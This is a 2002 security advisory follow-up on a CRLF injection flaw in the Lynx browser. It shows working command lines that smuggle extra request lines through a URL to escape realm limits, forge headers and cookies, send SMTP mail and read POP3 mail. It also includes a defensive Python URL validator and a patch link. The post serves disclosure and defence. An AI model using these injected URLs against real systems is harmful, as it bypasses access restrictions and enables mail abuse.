Lynx CRLF Injection, part two

From: Ulf Harnhammar (ulfhat_private)
Date: Thu Aug 22 2002 - 10:32:59 PDT


    This is a follow-up to my "Lynx CRLF Injection" post a few days
    ago.
    
    
    * Lynx has got a realm feature that restricts users from accessing
    any host apart from the host of its start page. That is, if you
    start Lynx with "lynx -realm http://www.site1.st/", you are not
    allowed to go to http://www.site2.st/ .
    
    The CRLF Injection security hole allows users to break out of
    realms - the command:
    
    $ lynx -realm "http://www.site1.st/ HTTP/1.0
    Host: www.site2.st
    
    "
    
    will show site2.st, despite the fact that it is outside of the realm.
    
    
    * It allows users to send arbitrary cookies, user agents and
    referers to a web server - even if you're using a restrictions option
    saying that you're not allowed to change user agent:
    
    $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
    User-Agent: Ulf 0.0
    Referer: http://www.metaur.nu/
    Cookie: user=ulf
    
    "
    
    
    * It is also possible to use this hole for communication with other
    types of servers than HTTP servers. You can send e-mails with it, for
    example - even if you're using a restrictions option saying that
    you're not allowed to send e-mails:
    
    $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
    HELO my.own.site
    MAIL FROM: <my.ownat_private>
    RCPT TO: <infoat_private>
    DATA
    From: my.ownat_private
    To: infoat_private
    Subject: This is..
    
    This is a URL that sends an e-mail (?).
    .
    QUIT
    
    "
    
    You have to use port 587, as Lynx blocks port 25.
    
    The MTA will complain about the "GET / HTTP/1.0" string, but it
    still works.
    
    
    * You can even use this hole for reading e-mails from a POP3 server:
    
    $ lynx "http://mail.site1.st:110/ HTTP/1.0
    USER ulf
    PASS xxxx
    LIST
    RETR 1
    QUIT
    
    "
    
    The POP3 server will also complain about the "GET / HTTP/1.0"
    string, but the technique still works here as well.
    
    
    * As previously noted, the holes listed above mostly affect programs
    that start Lynx, interactively or not, with a URL wholly or partially
    under the user's control.
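    For such a program, the fix on the caller's side is to refuse any URL
    that could be split into extra request lines before it is ever passed
    to Lynx. The following is an added example, not code from the advisory
    or from Lynx: url_problem() rejects control and whitespace bytes and,
    optionally, any host other than the intended realm host, and
    smuggled_lines() shows what the unescaped URL above turns into once a
    client splices it into "GET <url> HTTP/1.0". Function and variable
    names are the example's own.

```python
import re
from urllib.parse import urlsplit

# Any byte that can terminate or split a request line: CR, LF, the other
# C0 controls, space/tab (the request line is space-delimited) and DEL.
_UNSAFE = re.compile(r"[\x00-\x20\x7f]")


def url_problem(url, realm_host=None):
    """Return None if url is safe to hand to a fetcher, else a short reason.

    realm_host, if given, is the only host the caller means to allow; this
    mirrors the -realm restriction that the injected URL bypasses.
    """
    m = _UNSAFE.search(url)
    if m:
        return "control/whitespace byte 0x%02x at offset %d" % (ord(m.group()), m.start())
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return "missing host"
    if realm_host and parts.hostname.lower() != realm_host.lower():
        return "host %s is outside realm %s" % (parts.hostname, realm_host)
    return None


def smuggled_lines(url):
    """Show the request a naive client builds from the raw URL: every line
    after the first is a header or protocol command chosen by the URL's author."""
    request = "GET " + url + " HTTP/1.0"
    return request.replace("\r\n", "\n").split("\n")


def lynx_argv(url, realm_host):
    """Build the Lynx command line only if the URL passes; raise otherwise."""
    problem = url_problem(url, realm_host)
    if problem:
        raise ValueError("refusing to launch lynx: " + problem)
    return ["lynx", "-realm", url]


if __name__ == "__main__":
    # Constructed sample mirroring the realm-escape URL from the advisory.
    bad = "http://www.site1.st/ HTTP/1.0\nHost: www.site2.st\n\n"
    for line in smuggled_lines(bad):
        print(repr(line))
    print(url_problem(bad, "www.site1.st"))
    print(lynx_argv("http://www.site1.st/", "www.site1.st"))
```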
    
    
    * The patch for this hole has moved to:
       ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
    
    
    // Ulf Harnhammar
    ulfhat_private
    